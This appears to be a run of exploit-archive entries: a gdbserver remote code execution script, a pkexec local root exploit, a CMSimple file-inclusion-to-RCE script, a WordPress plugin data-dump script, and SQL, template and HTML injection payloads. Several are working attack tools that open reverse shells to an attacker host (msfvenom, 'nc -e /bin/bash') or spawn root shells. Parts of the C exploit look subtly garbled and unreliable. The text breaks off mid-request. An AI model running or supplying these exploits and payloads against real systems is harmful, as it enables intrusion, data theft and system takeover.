import sys

help = f'''
Usage: python3 {sys.argv[0]} <gdbserver-ip:port> <path-to-shellcode>

Example:
- Victim's gdbserver   ->  10.10.10.200:1337
- Attacker's listener  ->  10.10.10.100:4444

1. Generate shellcode with msfvenom:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.10.100 LPORT=4444 PrependFork=true -o rev.bin

2. Listen with Netcat:
$ nc -nlvp 4444

3. Run the exploit:
$ python3 {sys.argv[0]} 10.10.10.200:1337 rev.bin
'''


def checksum(s: str) -> str:
    res = sum(map(ord, s)) % 256
    return f'{res:2x}'


def ack(sock):
    sock.send(b'+')


def send(sock, s: str) -> str:
    sock.send(f'${s}#{checksum(s)}'.encode())
    res = sock.recv(1024)
    ack(sock)
    return res.decode()


def exploit(sock, payload: str):
    send(sock, 'qSupported:multiprocess+;qRelocInsn+;qvCont+;')
    send(sock, '!')

    try:
        res = send(sock, 'vCont;s')
        data = res.split(';')[2]
        arch, pc = data.split(':')
    except Exception:
        print('[!] ERROR: Unexpected response. Try again later')
        exit(1)

    if arch == '10':
        print('[+] Found x64 arch')
        pc = binascii.unhexlify(pc[:pc.index('0*')])
        pc += b'\0' * (8 - len(pc))
        addr = hex(struct.unpack('<Q', pc)[0])[2:]
        addr = '0' * (16 - len(addr)) + addr
    elif arch == '08':
        print('[+] Found x86 arch')
        pc = binascii.unhexlify(pc)
        pc += b'\0' * (4 - len(pc))
        addr = hex(struct.unpack('<I', pc)[0])[2:]
        addr = '0' * (8 - len(addr)) + addr

    hex_length = hex(len(payload))[2:]

    print('[+] Sending payload')
    send(sock, f'M{addr},{hex_length}:{payload}')
    send(sock, 'vCont;c')


def main():
    if len(sys.argv) < 3:
        print(help)
        exit(1)

    ip, port = sys.argv[1].split(':')
    file = sys.argv[2]

    try:
        with open(file, 'rb') as f:
            payload = f.read().hex()
    except FileNotFoundError:
        print(f'[!] ERROR: File {file} not found')
        exit(1)

    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.connect((ip, int(port)))
        print('[+] Connected to target. Preparing exploit')
        exploit(sock, payload)
        print('[*] Pwned!! Check your listener')


if __name__ == '__main__':
    main()
HireHackking 
# Exploit Title: Aimeos Laravel ecommerce platform 2021.10 LTS - 'sort' SQL injection
# Date: 20/11/2021
# Exploit Author: Ilker Burak ADIYAMAN
# Vendor Homepage: https://aimeos.org
# Software Link: https://aimeos.org/laravel-ecommerce-package
# Version: Aimeos 2021.10 LTS
# Tested on: MacOSX

*Description:*

The Aimeos E-Commerce framework Laravel application is vulnerable to SQL injection via the 'sort' parameter on the json api.

==================== 1. SQLi ====================

https://127.0.0.1/default/jsonapi/review?sort=-ctime

The "sort" parameter is vulnerable to SQL injection, reveals table and column names.

step 1 : Copy json api GET request above.
step 2 : Change sort parameter value to --

----------------------------------------------------------------------
Parameter: sort (GET)
    Type: error based
    Title: GET parameter 'sort' appears to be injectable
    Payload: sort=--
HireHackking 
# Exploit Title: Wordpress Plugin WP Guppy 1.1 - WP-JSON API Sensitive Information Disclosure
# Exploit Author: Keyvan Hardani
# Date: 22/11/2021
# Vendor Homepage: https://wp-guppy.com/
# Version: up to 1.1
# Tested on: Kali Linux - Windows 10 - Wordpress 5.8.x and apache2
# Usage ./exploit.sh -h

#!/bin/bash

Help()
{
# Display Help
echo "Usage"
echo
echo "Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure"
echo
echo "Option 1: Get all users ( ./exploit.sh 1 domain.com)"
echo "Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1493 1507 ) => Senderid=1493 & Receiverid=1507"
echo "Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493) => Receiverid=1493 & Userid= 1493"
echo "-h Print this Help."
echo
}

while getopts ":h" option; do
case $option in
h) # display Help
Help
exit;;
esac
done

if [ $1 == 1 ]
then
curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" | python -m json.tool
fi

if [ $1 == 2 ]
then
curl -s -X POST --url "https://$2/wp-json/guppy/v2/send-guppy-message" --data '{"receiverId":"'$3'","userId":"'$4'","guppyGroupId":"","chatType":1,"message":"test","replyTo":"","latitude":"","longitude":"","messageType":0,"messageStatus":0,"replyId":"","timeStamp":1637583213,"messageSentTime":"November 22, 2021","metaData":{"randNum":5394},"isSender":true}' -H 'Content-Type: application/json'| python -m json.tool
fi
if [ $1 == 3 ]
then
curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId=$3&userId=$4&chatType=1" | python -m json.tool
fi
HireHackking 
# Exploit Title: Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)
# Date: 11/22/21
# Exploit Author: Ujas Dhami
# Version: 4.19 - 5.2.1
# Platform: Linux
# Tested on:
# ~ Ubuntu 19.04 kernel 5.0.0-15-generic
# ~ Parrot OS 4.5.1 kernel 4.19.0-parrot1-13t-amd64
# ~ Kali Linux kernel 4.19.0-kali5-amd64
# CVE: CVE-2019-13272

// ....
// Original discovery and exploit author: Jann Horn
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
// Modified exploit code of: BColes
// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272
// ....
// ~ Uses the PolKit_Exec frontend.
// ~ PolKit_Action is branched.
// ~ Search is optimized.
// ~ Trunks attain search priority upon execution.
// ....
// ujas@kali:~$ gcc exploit_traceme.c -o exploit_traceme
// ujas@kali:~$ ./exploit_traceme
// Welcome to your Arsenal!
// accessing variables...
// execution has reached EOP.
// familiar trunks are been searched ...
// trunk helper found: /usr/sbin/mate-power-backlight-helper
// helper initiated: /usr/sbin/mate-power-backlight-helper
// SUID process is being initiated (/usr/bin/pkexec) ...
// midpid is being traced...
// midpid attached.
// root@kali:/home/ujas#
// ....

#include <ctype.h>
#include <assert.h>
#include <conio.h>
#include <stdio.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <stddef.h>
#include <sys/user.h>
#include <linux/elf.h>
#include <stdarg.h>
#include <pwd.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <sys/ptrace.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <signal.h>
#define _GNU_SOURCE

#define DEBUG
#ifdef DEBUG
#define dprintf printf
#endif
#define max(a,b) ((a)>(b) ? (a) : (b))
#define eff(expr) ({             \
  typeof(expr) __res = (expr);       \
  if (__res == -1) {             \
    dprintf("[-] Error: %s\n", #expr);     \
    return 0;            \
  }               \
  __res;               \
})

struct stat st;

const char *trunk[1024];

const char *trunks_rec[] = {
  "/usr/lib/x86_64-linux-gnu/xfce4/session/xfsm-shutdown-helper",
  "/usr/sbin/mate-power-backlight-helper",
  "/usr/lib/gnome-settings-daemon/gsd-backlight-helper",
  "/usr/lib/gnome-settings-daemon/gsd-wacom-led-helper",
  "/usr/lib/unity-settings-daemon/usd-backlight-helper",
  "/usr/bin/xfpm-power-backlight-helper",
  "/usr/bin/lxqt-backlight_backend",
  "/usr/lib/gsd-backlight-helper",
  "/usr/lib/gsd-wacom-led-helper",
  "/usr/lib/gsd-wacom-oled-helper",
  "/usr/libexec/gsd-wacom-led-helper",
  "/usr/libexec/gsd-wacom-oled-helper",
  "/usr/libexec/gsd-backlight-helper",
  
};
static int trace_align[2];
static const char *path_exec = "/usr/bin/pkexec";
static const char *path_action = "/usr/bin/pkaction";
static int fd = -1;
static int pipe_stat;
static const char *term_sh = "/bin/bash";
static int mid_succ = 1;
static const char *path_doublealign;

static char *tdisp(char *fmt, ...) {
  static char overlayfs[10000];
  va_list ap;
  va_start(ap, fmt);
  vsprintf(overlayfs, fmt, ap);
  va_end(ap);
  return overlayfs;
}

static int middle_main(void *overlayfs) {
  prctl(PR_SET_PDEATHSIG, SIGKILL);
  pid_t middle = getpid();
  fd = eff(open("/proc/_fd/exe", O_RDONLY));
  pid_t child = eff(fork());
  
  if (child == 0) {
    prctl(PR_SET_PDEATHSIG, SIGKILL);

    eff(dup2(fd, 42));
    int proc_fd = eff(open(tdisp("/proc/%d/status", middle), O_RDONLY));
    char *threadv = tdisp("\nUid:\t%d\t0\t", getuid());
    eff(ptrace(PTRACE_TRACEME, 0, NULL, NULL));
    execl(path_exec, basename(path_exec), NULL);
    while (1) {
      char overlayfs[1000];
      ssize_t buflen = eff(pread(proc_fd, overlayfs, sizeof(overlayfs)-1, 0));
      overlayfs[buflen] = '\0';
      if (strstr(overlayfs, threadv)) break;
    }

    dprintf("SUID execution failed.");
    exit(EXIT_FAILURE);
  }

  eff(dup2(fd, 0));
  eff(dup2(trace_align[1], 1));

  struct passwd *pw = getpwuid(getuid());
  if (pw == NULL) {
    dprintf("err: username invalid/failed to fetch username");
    exit(EXIT_FAILURE);
  }

  mid_succ = 1;
  execl(path_exec, basename(path_exec), "--user", pw->pw_name,
        path_doublealign,
        "--help", NULL);
  mid_succ = 0;
  dprintf("err: pkexec execution failed.");
  exit(EXIT_FAILURE);
}

static int timeexecbuffer(pid_t pid, int exec_fd, char *arg0) {
  struct user_regs_struct regs;
  struct exeio exev = { .iov_base = &regs, .iov_len = sizeof(regs) };
  eff(ptrace(PTRACE_SYSCALL, pid, 0, NULL));
  eff(waitpid(pid, &pipe_stat, 0));
  eff(ptrace(PTRACE_GETREGSET, pid, NT_PRSTATUS, &exev));

  unsigned long inject_surface = (regs.rsp - 0x1000) & ~0xfffUL;
  struct injected_page {
    unsigned long inj_arse[2];
    unsigned long environment[1];
    char arg0[8];
    char path[1];
  } ipage = {
    .inj_arse = { inject_surface + offsetof(struct injected_page, arg0) }
  };
  strcpy(ipage.arg0, arg0);
  for (int i = 0; i < sizeof(ipage)/sizeof(long); i++) {
    unsigned long pro_d = ((unsigned long *)&ipage)[i];
    eff(ptrace(PTRACE_POKETEXT, pid, inject_surface + i * sizeof(long),
                (void*)pro_d));
  }

  eff(ptrace(PTRACE_SETREGSET, pid, NT_PRSTATUS, &exev));
  eff(ptrace(PTRACE_DETACH, pid, 0, NULL));
  eff(waitpid(pid, &pipe_stat, 0));
  
  regs.orig_rax = __NR_execveat;
  regs.rdi = exec_fd;
  regs.rsi = inject_surface + offsetof(struct injected_page, path);
  regs.rdx = inject_surface + offsetof(struct injected_page, inj_arse);
  regs.r10 = inject_surface + offsetof(struct injected_page, environment);
  regs.r8 = AT_EMPTY_PATH;
}

static int stag_2(void) {
  pid_t child = eff(waitpid(-1, &pipe_stat, 0));
  timeexecbuffer(child, 42, "stage3");
  return 0;
}

static int sh_spawn(void) {
  eff(setresgid(0, 0, 0));
  eff(setresuid(0, 0, 0));
  execlp(term_sh, basename(term_sh), NULL);
  dprintf("err: Shell spawn unsuccessful.", term_sh);
  exit(EXIT_FAILURE);
}

static int check_env(void) {
  const char* xdg_session = getenv("XDG_SESSION_ID");

  dprintf("accessing variables...\n");

  if (stat(path_action, &st) != 0) {
    dprintf("err: pkaction not found at %s.", path_action);
    exit(EXIT_FAILURE);
  }
  if (system("/bin/loginctl --no-ask-password show-session $XDG_SESSION_ID | /bin/grep Remote=no >>/dev/null 2>>/dev/null") != 0) {
    dprintf("warn: PolKit agent not found.\n");
    return 1;
  }
  if (stat("/usr/sbin/getsebool", &st) == 0) {
    if (system("/usr/sbin/getsebool deny_ptrace 2>1 | /bin/grep -q on") == 0) {
      dprintf("warn: [deny_ptrace] is enabled.\n");
      return 1;
    }
  }
  if (xdg_session == NULL) {
    dprintf("warn: $XDG_SESSION_ID is not set.\n");
    return 1;
  }
  if (stat(path_exec, &st) != 0) {
    dprintf("err: pkexec not found at %s.", path_exec);
    exit(EXIT_FAILURE);
  }
  
  dprintf("execution has reached EOP.\n");

  return 0;
}

int trunkh() {
  char cmd[1024];
  snprintf(cmd, sizeof(cmd), "%s --verbose", path_action);
  FILE *fp;
  fp = popen(cmd, "r");
  if (fp == NULL) {
    dprintf("err: Failed to run %s.\n", cmd);
    exit(EXIT_FAILURE);
  }

  char line[1024];
  char buffer[2048];
  int helper_index = 0;
  int useful_action = 0;
  static const char *threadv = "org.freedesktop.policykit.exec.path -> ";
  int needle_length = strlen(threadv);

  while (fgets(line, sizeof(line)-1, fp) != NULL) {
    if (strstr(line, "implicit active:")) {
      if (strstr(line, "yes")) {
        useful_action = 1;
      }
      continue;
    }

    if (useful_action == 0)
      continue;
    useful_action = 0;

    int length = strlen(line);
    char* found = memmem(&line[0], length, threadv, needle_length);
    if (found == NULL)
      continue;

    memset(buffer, 0, sizeof(buffer));
    for (int i = 0; found[needle_length + i] != '\n'; i++) {
      if (i >= sizeof(buffer)-1)
        continue;
      buffer[i] = found[needle_length + i];
    }

    if (stat(&buffer[0], &st) != 0)
      continue;
    
    if (strstr(&buffer[0], "/xf86-video-intel-backlight-helper") != 0 ||
      strstr(&buffer[0], "/cpugovctl") != 0 ||
      strstr(&buffer[0], "/package-system-locked") != 0 ||
      strstr(&buffer[0], "/cddistupgrader") != 0) {
      dprintf("blacklisted thread helper ignored: %s\n", &buffer[0]);
      continue;
    }

    trunk[helper_index] = strndup(&buffer[0], strlen(buffer));
    helper_index++;

    if (helper_index >= sizeof(trunk)/sizeof(trunk[0]))
      break;
  }

  pclose(fp);
  return 0;
}

int root_ptraceme() {
  dprintf("helper initiated: %s\n", path_doublealign);

  eff(pipe2(trace_align, O_CLOEXEC|O_DIRECT));
  eff(fcntl(trace_align[0], F_SETPIPE_SZ, 0x1000));
  char overlayfs = 0;
  eff(write(trace_align[1], &overlayfs, 1));

  dprintf("SUID process is being initiated(%s) ...\n", path_exec);
  static char stackv[1024*1024];
  pid_t midpid = eff(clone(middle_main, stackv+sizeof(stackv),
                            CLONE_VM|CLONE_VFORK|SIGCHLD, NULL));
  if (!mid_succ) return 1;
  while (1) {
    int fd = open(tdisp("/proc/%d/comm", midpid), O_RDONLY);
    char overlayfs[16];
    int buflen = eff(read(fd, overlayfs, sizeof(overlayfs)-1));
    overlayfs[buflen] = '\0';
    *strchrnul(overlayfs, '\n') = '\0';
    if (strncmp(overlayfs, basename(path_doublealign), 15) == 0)
      break;
    usleep(100000);
  }

  dprintf("midpid is being traced...\n");
  eff(ptrace(PTRACE_ATTACH, midpid, 0, NULL));
  eff(waitpid(midpid, &pipe_stat, 0));
  dprintf("midpid attached.\n");

  timeexecbuffer(midpid, 0, "stage2");
  exit(EXIT_SUCCESS);
}

int main(int argc, char **inj_arse) {
  if (strcmp(inj_arse[0], "stage2") == 0)
    return stag_2();
  if (strcmp(inj_arse[0], "stage3") == 0)
    return sh_spawn();

  dprintf("Welcome to your Arsenal!\n");

  check_env();

  if (argc > 1 && strcmp(inj_arse[1], "check") == 0) {
    exit(0);
  }
  
  dprintf("efficient trunk is being searched...\n");
  trunkh();
  for (int i=0; i<sizeof(trunk)/sizeof(trunk[0]); i++) {
    if (trunk[i] == NULL)
      break;

    if (stat(trunk[i], &st) == 0) {
      path_doublealign = trunk[i];
      root_ptraceme();
    }
  }

  dprintf("familiar trunks are been searched ...\n");
  for (int i=0; i<sizeof(trunks_rec)/sizeof(trunks_rec[0]); i++) {
    if (stat(trunks_rec[i], &st) == 0) {
      path_doublealign = trunks_rec[i];
      dprintf("trunk helper found: %s\n", path_doublealign);
      root_ptraceme();
    }
  }

  return 0;
}
HireHackking 
# Exploit Title: FLEX 1085 Web 1.6.0 - HTML Injection
# Date: 2021-11-21
# Exploit Author: Mr Empy
# Vendor Homepage: https://www.tem.ind.br/
# Software Link: https://www.tem.ind.br/?page=prod-detalhe&id=94
# Version: 1.6.0
# Tested on: Android


Title:
================
FLEX 1085 Web - HTML Injection

Summary:
================
The FLEX 1085 Web appliance is vulnerable to an HTML injection attack that
allows the injection of arbitrary HTML code.


Severity Level:
================
5.3 (Medium)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N


Vulnerability Disclosure Schedule:
============================
* October 19, 2021: An email was sent to support at 6:08MP.

* November 20, 2021: I didn't get any response from support.

* November 21, 2021: Vulnerability Disclosure


Affected Product:
================
FLEX 1085 Web v1.6.0


Steps to Reproduce:
================

1. Open your browser and search for your device's IP address (http://<IP>).

2. Log in to the device's dashboard and go to "WiFi".

3. Use another device that has an access point and create a Wi-Fi network
called "<h1>HTML Injection</h1>" (no double quotes) and activate the access
point. (https://prnt.sc/20e4y88)

4. Go back to the FLEX device and when scanning the new WiFi networks, the
new network will appear written "HTML Injection" in bold and with a larger
font size. (http://prnt.sc/20e51li)
HireHackking 
# Exploit Title: Bus Pass Management System 1.0 - 'Search' SQL injection
# Date: 23-11-2021
# Exploit Author: Abhijeet Singh
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql/
# Version: v-1.0 (Default)
# Tested on: macOS Monterey(Version 12.0.1)

*SQL Injection:*
SQL injection is a web security vulnerability that allows an attacker to alter the SQL queries made to the database. This can be used to retrieve some sensitive information, like database structure, tables, columns, and their underlying data.

*Attack Vector:*
An attacker can compromise the database of the application using some automated(or manual) tools like SQLmap.

*Steps to reproduce:*
Step-1: Open 'View Pass' page using following URL:
http://127.0.0.1/buspassms/download-pass.php


2. Now put the below payload in the 'Search' field.
*Payload: *123' AND (SELECT 7169 FROM (SELECT(SLEEP(4)))abhi) AND 'x'='x

3. Server accepted our payload and the response got delayed by 4 seconds.

*IMPACT:*
As the vulnerable parameter is an external parameter (credentials not
required), an attacker can dump the database of the application remotely.

Suggested Mitigation/Remediation Actions
Parameterized queries should be used to separate the command and data
portions of the intended query to the database. These queries prevent
an attacker from tampering with the query logic and extending a
concatenated database query string. Code reviews should be conducted
to identify any additional areas where the application or other
applications in the organization are vulnerable to this attack.
Additionally, input validation should be enforced on the server side
in order to ensure that only expected data is sent in queries. Where
possible security specific libraries should be used in order to
provide an additional layer of protection.
HireHackking 
# Exploit Title: Webrun 3.6.0.42 - 'P_0' SQL Injection
# Google Dork: intitle:"Webrun 3.6.0.42"
# Date: 23/11/2021
# Exploit Author: Vinicius Alves
# Vendor Homepage: https://softwell.com.br/
# Version: 3.6.0.42
# Tested on: Kali Linux 2021.3
# CVE: CVE-2021-43650

=-=-=-= Description =-=-=-=


Webrun version 3.6.0.42 is vulnerable to SQL Injection, applied to the P_0
parameter used to set the username during the login process.


=-=-=-= Exploiting =-=-=-=


In the post request, change the P_0 value to the following payload:
121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd


You will see some information like below:


interactionError('ERRO: sintaxe de entrada é inválida para tipo numeric:
\"qvvxq1qbzbq\"', null, null, null, '<b>


=-=-=-= POC =-=-=-=


If the return has the value 'qvvxq1qbzbq', you will be able to successfully
exploit this.


See an example of the complete POST parameter:


action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121')+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+('AYkd'%3d'AYkd&P_1=pwd
HireHackking 
# Exploit Title: CMSimple 5.4 - Local file inclusion (LFI) to Remote code execution (RCE) (Authenticated)
# Date: 11/15/2021
# Exploit Author: S1lv3r
# Vendor Homepage: https://www.cmsimple.org/en/
# Software Link: https://www.cmsimple.org/en/
# Version:  CMSimple 5.4
# Tested on: CMSimple 5.4

# writeup:
# https://github.com/iiSiLvEr/CMSimple5.4-Vulnerabilities

#!/usr/bin/python3
import requests
import threading
import datetime
import sys
from bs4 import BeautifulSoup


x = datetime.datetime.now()
addSeconds = datetime.timedelta(0, 10)
Time = x + addSeconds

proxies = {"http": "http://127.0.0.1:8080","https": "https://127.0.0.1:8080",}
def Login():
	try:
		global Time
		s = requests.Session()
		headers= {"Content-Type": "application/x-www-form-urlencoded"}
		
		data = f'login=true&selected=Welcome_to_CMSimple_5&User={User}&passwd={Password}&submit=Login'

		response = s.post(RHOST, data=data, headers=headers, verify=False)#, proxies=proxies
		if response.cookies['passwd']:
			print("(+) Sucessfully Logged In With " + User + ":" + Password)

			cookies = response.cookies
			params = (('file', 'config'),('action', 'array'),)
			response = s.get(RHOST ,cookies=cookies ,params=params,verify=False)
			soup = BeautifulSoup(response.text, 'lxml')
			CsrfValue = soup.find('input',attrs = {'name':'csrf_token'})['value']
			print("(+) Get CSRF Token  : [ " + CsrfValue + " ]")
			data = f'csrf_token={CsrfValue}&functions_file=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flib%2Fphp%2Fsessions%2Fsess_S1lv3r&form=array&file=config&action=save'
			response = s.post(RHOST, headers=headers, cookies=cookies, data=data, verify=False)
			print("(+) Changing Functions file Done  ")
			print("(+) Check Your nc listner on " + LPORT)
	except Exception as error:
		print("Error, Exiting;( ")
		print(error)
		pass
def fuzz():
	while True:
		try:
			sessionName = "S1lv3r"
			cookies = {'PHPSESSID': sessionName}
			files = {'PHP_SESSION_UPLOAD_PROGRESS':(None,
				'<?php passthru("nc '+ LHOST +' '+ LPORT + ' -e /bin/bash");?>'),
				'file': ('Anything', 'S1lv3r'*100, 'application/octet-stream')}
			x = requests.post(RHOST, files=files, cookies=cookies, verify=False)#, proxies=proxies
		except Exception as error:
			print(error)
			exit()
def main():
	print("\n(+) CMSimple LFI to RCE \n")
	Login()
	threads = []
	for _ in range(20):
		t = threading.Thread(target=fuzz)
		t.start()
		threads.append(t)
	for thread in threads:
		thread.join

if __name__ == "__main__":

    if len(sys.argv) <= 5:
        print("\n(-) Usage: {} <RHOST> <LHOST> <LPORT> <USER> <PASS>".format(sys.argv[0]))
        print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))
        print("\n(=) SiLvEr \n")
        exit()  
    else:
    	RHOST = sys.argv[1]
    	LHOST = sys.argv[2]
    	LPORT = sys.argv[3]
    	User =  sys.argv[4]
    	Password = sys.argv[5]
    	main()
HireHackking 
# Exploit Title: HTTPDebuggerPro 9.11 - Unquoted Service Path
# Exploit Author: Aryan Chehreghani
# Date: 23/11/2021
# Vendor Homepage: https://www.httpdebugger.com
# Software Link: https://www.httpdebugger.com/download.html
# Version: 9.11
# Tested on: Windows 10 x64

SERVICE_NAME: HTTPDebuggerPro
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\HTTPDebuggerPro\HTTPDebuggerSvc.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : HTTP Debugger Pro
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
HireHackking 
# Exploit Title: Bagisto 1.3.3 - Client-Side Template Injection
# Date: 11-25-2021
# Exploit Author: Mohamed Abdellatif Jaber
# Vendor Homepage: https://bagisto.com/en/
# Software Link: https://github.com/bagisto/bagisto
# Version: v1.3.3
# Tested on: [windows | chrome | firefox ]

Exploit :.
1- register an account and login your account
2- go to your profile and edit name , address
2- and put this payload {{constructor.constructor('alert(document.domain)')()}}
3- admin or any one view order or your profile will execute arbitrary JS-code
.

rf:https://portswigger.net/kb/issues/00200308_client-side-template-injection
HireHackking 
# Exploit Title: orangescrum 1.8.0 - 'Multiple' SQL Injection (Authenticated)
# Date: 28/11/2021
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Company: https://redteam.pl
# Vendor Homepage: https://www.orangescrum.org/
# Software Link: https://www.orangescrum.org/
# Version: 1.8.0
# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### SQL Injection


# Authenticated user

-----------------------------------------------------------------------------------------------------------------------
# POC
-----------------------------------------------------------------------------------------------------------------------

## Example vuln parameters:

* project_id
* old_project_id
* uuid
* uniqid
* projid
* id
* caseno

-----------------------------------------------------------------------------------------------------------------------
-----------------------------------------------------------------------------------------------------------------------

## Example

-----------------------------------------------------------------------------------------------------------------------
Req old_project_id=1' - error
-----------------------------------------------------------------------------------------------------------------------

POST /orangescrum/easycases/move_task_to_project HTTP/1.1
Origin: http://127.0.0.1
Content-Length: 64
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:80
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Connection: close
X-Requested-With: XMLHttpRequest
Sec-Fetch-Mode: cors
Cookie: language=en-gb; currency=USD; CAKEPHP=onb8uaoqhe4kst0cj5koufc781; user_uniq_agent=9c7cba4c3dd1b2f7ace2dd877a58051a25561a365a6631f0; USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; USERTYP=2; USERTZ=28; USERSUB_TYPE=0; IS_MODERATOR=0; SES_TYPE=1; SES_COMP=1; CMP_CREATED=2021-11-28+10%3A52%3A11; COMP_UID=8b0e7877a94c648807ef19006c68edf9; DEFAULT_PAGE=dashboard; LISTVIEW_TYPE=comfort; LAST_CREATED_PROJ=3; TASKGROUPBY=duedate; ALL_PROJECT=all; CURRENT_FILTER=assigntome; STATUS=2
Referer: http://127.0.0.1/orangescrum/dashboard
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Dest: empty

project_id=3&old_project_id=2'&case_id=2&case_no=1&is_multiple=0

-----------------------------------------------------------------------------------------------------------------------
Res:
-----------------------------------------------------------------------------------------------------------------------

HTTP/1.1 500 Internal Server Error
Date: Sun, 28 Nov 2021 12:42:30 GMT
Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
X-Powered-By: PHP/5.6.40
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USER_UNIQ=e0bd28cc49dc2c60c80c7488b61c2aa2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTYP=2; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERTZ=28; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: USERSUB_TYPE=0; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_TYPE=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: SES_COMP=1; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: CMP_CREATED=2021-11-28+10%3A52%3A11; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Set-Cookie: COMP_UID=8b0e7877a94c648807ef19006c68edf9; expires=Sun, 28-Nov-2021 14:42:30 GMT; Max-Age=7200; path=/; domain=127.0.0.1
Content-Length: 132182
Vary: User-Agent
Expires: access 12 month
Connection: close
[...]

-----------------------------------------------------------------------------------------------------------------------
Req old_project_id=1'' - not error
-----------------------------------------------------------------------------------------------------------------------

POST /orangescrum/easycases/move_task_to_project HTTP/1.1
Origin: http://127.0.0.1
Content-Length: 66
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: same-origin
Host: 127.0.0.1:80
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Connection: close
X-Requested-With: XMLHttpRequest
Sec-Fetch-Mode: cors
